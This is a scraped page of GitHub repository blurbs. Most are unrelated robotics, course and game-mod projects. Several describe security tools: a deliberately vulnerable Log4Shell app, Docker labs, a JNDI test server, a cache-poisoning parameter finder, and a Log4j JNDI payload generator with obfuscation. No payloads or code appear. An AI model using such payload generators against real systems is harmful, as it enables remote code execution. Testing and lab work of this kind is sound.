    opened by snyk-bot 0
Owner
Cybersecurity and Infrastructure Security Agency
Commit today, secure tomorrow.
This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.

param-miner This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. It combin

Intruder 9 Jan 27, 2022
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Christophe Tafani-Dereeper 1k Jan 5, 2023
An open-source, free, scanner for exotic armour in Hypixel Skyblock

TheExoticsMod An open-source, free, scanner for exotic armour in Hypixel Skyblock! Searches friendslists, the auction house, and inventories to find e

null 4 Dec 26, 2022
Allows acquiring of vanilla/mod assets at runtime instead of including them in builds potentially violating licenses

AssetMover Allows acquiring of vanilla/mod assets at runtime instead of including them in builds potentially violating licenses. Features: Downloading

Cleanroom 5 Nov 26, 2022
This project uses the artificial potential field method to realize the path planning of the robot, and completes the trajectory optimization through other settings. It can also be combined with laser SLAM, target recognition and other technologies for path planning.

FRCAutoDriver Project Instruction: This project uses the artificial potential field method to realize the robot's path planning, completes trajectory optimization through other settings, and can also be combined with laser SLAM, target recognition and other technologies for path planning. This project uses the artificial potential field

ZhangzrJerry 2 Sep 9, 2022
This repository is related to the Java Web Developer (ND035), Course - Web Services and APIs

About this Repository This repository is related to the Java Web Developer (ND035), Course - Web Services and APIs It contains the following folders:

Rasha Omran 1 Jan 28, 2022
An assistance platform made using Spring framework that analyses your code, and helps you either to start a devops project, or to turn an existing project into a devops project using open source software (Git, Docker, Jenkins..)

DevOpsify Description An assistance platform made using Spring framework that analyses your code, and helps you either to start a devops project, or t

obaydah bouifadene 14 Nov 8, 2022
This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Immunity, Inc 9 Jun 30, 2022
Team project within the course of Software System Design and Analysis.

InnoBookCrossing - Application for sharing books at Innopolis Description The application is designed to help people share books with each other. All

Dariya 33 Oct 22, 2022
Served as the team leader to collaborate with another intern for a project and drew up our working schedule

Served as the team leader to collaborate with another intern for a project and drew up our working schedule, risk management plan, quality control plan, configuration management plan, etc Compiled codes for the front end and back end, composed the development documentation and explored SSM structure and MyBatis structure.

bright spark 2 Jan 17, 2022
Restaurant Advisor application created for Munich as part of team project at the university.

Restaurant Advisor Application It is important to mention that this application was created for educational purposes. Restaurants information is taken

Johnpier 1 Oct 16, 2022
GitHub Action to download and install Oracle's Java Development Kit builds

oracle-actions/setup-java This action downloads a Java Development Kit (JDK) built by Oracle and installs it using actions/setup-java. JDKs built by O

Oracle GitHub Actions 43 Dec 15, 2022
Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec

log4shell-dockerlab Credits All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all. LunaSec - log4s

ChoI 7 Nov 17, 2022
Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16

Oxygen XML Patch Tool for Apache Log4j vulnerability CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 This is a tool that updates the log4j version 2

oXygen XML Editor 3 Jan 10, 2022
Log4j-payload-generator - Log4j jndi injects the Payload generator

0x01 Introduction: log4j-payload-generator is a plugin for the woodpecker framework that generates payloads for the log4j JNDI injection vulnerability. It can currently generate the following 5 categories of payload with one click: the original payload, the {[upper|lower]:x}-type randomly obfuscated payload, {[upper|lower]:x}

null 469 Dec 30, 2022
Community-Driven Game Server Development solution for Java Developers based on DEEPINTHINK MagOKO Project.

MagOKO Stack Community-Driven Game Server Development solution for Java Developers based on DEEPINTHINK MagOKO Project. License Copyright 2021-present

DeepInThink Community 10 Jun 1, 2021
Robot Application for void, our 2022 Robot for FIRST Rapid React

void TODO insert cool void logo here Robot Application for void, our 2022 Robot for FIRST Rapid React Building To build the application locally, run .

FRC Team #862, Lightning Robotics 9 Apr 4, 2022
AEMBOT's robot code for the 2022 game RAPID REACT.

FRC_2022 AEMBOT 6443's 2022 FRC Repository Setup and Installation [Start Here](link first time git setup in wiki) Software [Stuff] (wiki or external l

FRC 6443 - AEMBOT 8 Dec 3, 2022